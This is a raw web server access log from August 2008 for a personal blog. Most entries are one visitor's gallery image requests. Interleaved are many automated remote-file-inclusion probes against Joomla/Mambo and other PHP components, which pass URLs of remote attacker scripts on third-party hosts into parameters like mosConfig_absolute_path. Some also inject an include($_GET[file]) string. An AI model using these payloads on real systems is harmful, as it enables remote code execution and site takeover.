206.190.75.8 - - [21/Aug/2008:11:36:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-108.jpg HTTP/1.1" 200 492938 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:22 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-111.jpg HTTP/1.1" 200 533106 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-119.jpg HTTP/1.1" 200 591382 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-120.jpg HTTP/1.1" 200 636941 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-127.jpg HTTP/1.1" 200 647576 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-125.jpg HTTP/1.1" 200 700424 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-113.jpg HTTP/1.1" 200 708496 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:36:24 -0700] "GET /logs/access_080628.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-149.jpg HTTP/1.1" 200 265071 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-138.jpg HTTP/1.1" 200 562801 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-121.jpg HTTP/1.1" 200 469065 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-123.jpg HTTP/1.1" 200 406611 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-110.jpg HTTP/1.1" 200 531565 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-140.jpg HTTP/1.1" 200 524288 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:28 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=5&716 HTTP/1.1" 200 3451 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:28 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&43 HTTP/1.1" 200 185990 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:28 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1015.jpg HTTP/1.1" 200 280431 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-021_1.jpg HTTP/1.1" 200 410647 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:36:31 -0700] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:33 -0700] "GET /blog/index.php/2008/08/page/3/ HTTP/1.1" 200 68408 "http://dmulk.com/blog/2008/08/page/2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-044_0.jpg HTTP/1.1" 200 329985 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-056.jpg HTTP/1.1" 200 335294 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:36:37 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9943 "-" "libwww-perl/5.808" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:36:40 -0700] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:36:41 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9937 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:36:45 -0700] "GET /logs/access_080802.log//index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:36:45 -0700] "GET /logs//index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:36:46 -0700] "GET //index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 9884 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:36:52 -0700] "GET /logs/access_080802.log//index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:36:52 -0700] "GET /logs//index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:36:53 -0700] "GET //index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 9884 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
203.22.204.97 - - [21/Aug/2008:11:37:07 -0700] "GET /logs/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.97 - - [21/Aug/2008:11:37:07 -0700] "GET /administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:11:37:11 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://sexywomenonly.com/home/groups/orca/log/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:11:37:11 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://sexywomenonly.com/home/groups/orca/log/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:37:15 -0700] "GET /logs/access_080802.log//index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:37:15 -0700] "GET /logs//index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:37:16 -0700] "GET //index.php?abg_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 9884 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
83.211.35.160 - - [21/Aug/2008:11:37:18 -0700] "GET //error.php?page=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:37:21 -0700] "GET /index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:37:21 -0700] "GET /logs/index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:37:21 -0700] "GET /logs/access_080424.log/index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:37:24 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:37:28 -0700] "GET /logs/access_080519.log/index2.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:37:28 -0700] "GET /index2.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:37:28 -0700] "GET /logs/index2.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:37:40 -0700] "GET /logs/access_080118.log//errors.php?error=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:37:42 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:37:43 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9943 "-" "libwww-perl/5.808" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:37:48 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:37:48 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.80.16 - - [21/Aug/2008:11:37:52 -0700] "GET /logs/access_080612.log/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:37:52 -0700] "GET /blog/wp-content/gallery/westoc-2008/westoc2008.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:38:06 -0700] "GET /logs/access_080628.log//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:38:10 -0700] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:11:38:14 -0700] "GET /logs/access_080516.log/index2.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-140.jpg HTTP/1.1" 200 548515 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-155.jpg HTTP/1.1" 200 372924 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-149.jpg HTTP/1.1" 200 265071 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
118.129.166.13 - - [21/Aug/2008:11:38:16 -0700] "GET /logs/access_080728.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-146.jpg HTTP/1.1" 200 451211 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-110.jpg HTTP/1.1" 200 531565 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:17 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&960 HTTP/1.1" 200 185990 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:17 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=4&459 HTTP/1.1" 200 157653 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-165.jpg HTTP/1.1" 200 347615 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-163.jpg HTTP/1.1" 200 399085 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-006_1.jpg HTTP/1.1" 200 542867 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:38:19 -0700] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-128_0.jpg HTTP/1.1" 200 488795 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-063_0.jpg HTTP/1.1" 200 328303 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-013_1.jpg HTTP/1.1" 200 523788 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-060_0.jpg HTTP/1.1" 200 479572 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:22 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-138.jpg HTTP/1.1" 200 562801 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-027_0.jpg HTTP/1.1" 200 246333 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-034_1.jpg HTTP/1.1" 200 270750 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-048_1.jpg HTTP/1.1" 200 307908 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-066_0.jpg HTTP/1.1" 200 378384 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-069_0.jpg HTTP/1.1" 200 206667 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-067_0.jpg HTTP/1.1" 200 466805 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-019_1.jpg HTTP/1.1" 200 350410 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-072_0.jpg HTTP/1.1" 200 566463 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-074_0.jpg HTTP/1.1" 200 559939 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-079_0.jpg HTTP/1.1" 200 373108 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-086_0.jpg HTTP/1.1" 200 267664 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-083_0.jpg HTTP/1.1" 200 346900 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-089_0.jpg HTTP/1.1" 200 326432 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-075_0.jpg HTTP/1.1" 200 488352 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-088_0.jpg HTTP/1.1" 200 351133 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-090_0.jpg HTTP/1.1" 200 312512 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:28 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-100_0.jpg HTTP/1.1" 200 441605 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:28 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-099_0.jpg HTTP/1.1" 200 478556 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:28 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-107_0.jpg HTTP/1.1" 200 371028 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-121_0.jpg HTTP/1.1" 200 474198 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-116.jpg HTTP/1.1" 200 504268 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
